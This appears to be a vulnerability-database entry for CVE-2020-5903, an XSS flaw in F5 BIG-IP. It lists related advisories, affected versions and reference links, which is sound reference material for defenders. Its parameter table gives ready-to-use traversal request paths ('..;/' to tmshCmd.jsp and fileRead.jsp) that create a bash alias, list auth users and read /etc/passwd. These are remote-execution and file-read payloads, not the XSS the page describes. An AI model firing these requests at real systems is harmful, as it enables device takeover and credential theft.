| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| The vulnerabilities of BIG-IP’s access control and remote authentication mechanisms (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) are related to the lack of protective measures for the website structure. This allows attackers to carry out cross-site scripting attacks. | 6 Sep 202100:00 | – | bdu_fstec | |
| CVE-2020-5903 | 3 Jul 202017:08 | – | circl | |
| F5 BIG-IP Cross-Site Scripting Vulnerability (CNVD-2020-61639) | 2 Jul 202000:00 | – | cnvd | |
| CVE-2020-5903 | 1 Jul 202014:42 | – | cvelist | |
| EUVD-2020-27057 | 7 Oct 202500:30 | – | euvd | |
| Exploit for Cross-site Scripting in F5 Big-Ip_Access_Policy_Manager | 25 Aug 202002:07 | – | githubexploit | |
| K43638305: BIG-IP TMUI XSS vulnerability CVE-2020-5903 | 21 Feb 202318:53 | – | f5 | |
| F5 Networks BIG-IP : BIG-IP TMUI XSS vulnerability (K43638305) | 1 Jul 202000:00 | – | nessus | |
| CVE-2020-5903 | 1 Jul 202015:15 | – | nvd | |
| CVE-2020-5903 | 1 Jul 202015:15 | – | osv |
[
{
"product": "BIG-IP",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1"
}
]
}
]| Source | Link |
|---|---|
| kb | www.kb.cert.org/vuls/id/290915 |
| support | www.support.f5.com/csp/article/K43638305 |
| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list | Remote code execution via tmshCmd.jsp by deleting a cli alias | |
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash | Remote code execution via tmshCmd.jsp by creating a cli alias with bash command | |
| fileName | query param | tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id | Write arbitrary content to a file via fileSave.jsp | |
| content | query param | tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/WWWWW&content=id | Write arbitrary content to a file via fileSave.jsp | |
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/WWWWW | List command output including a temporary file via tmshCmd.jsp | |
| command | query param | tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user | Read user authentication information via tmshCmd.jsp | |
| fileName | query param | tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd | Read sensitive system file via fileRead.jsp | |
| directoryPath | query param | tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ | List directory contents via directoryList.jsp |
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation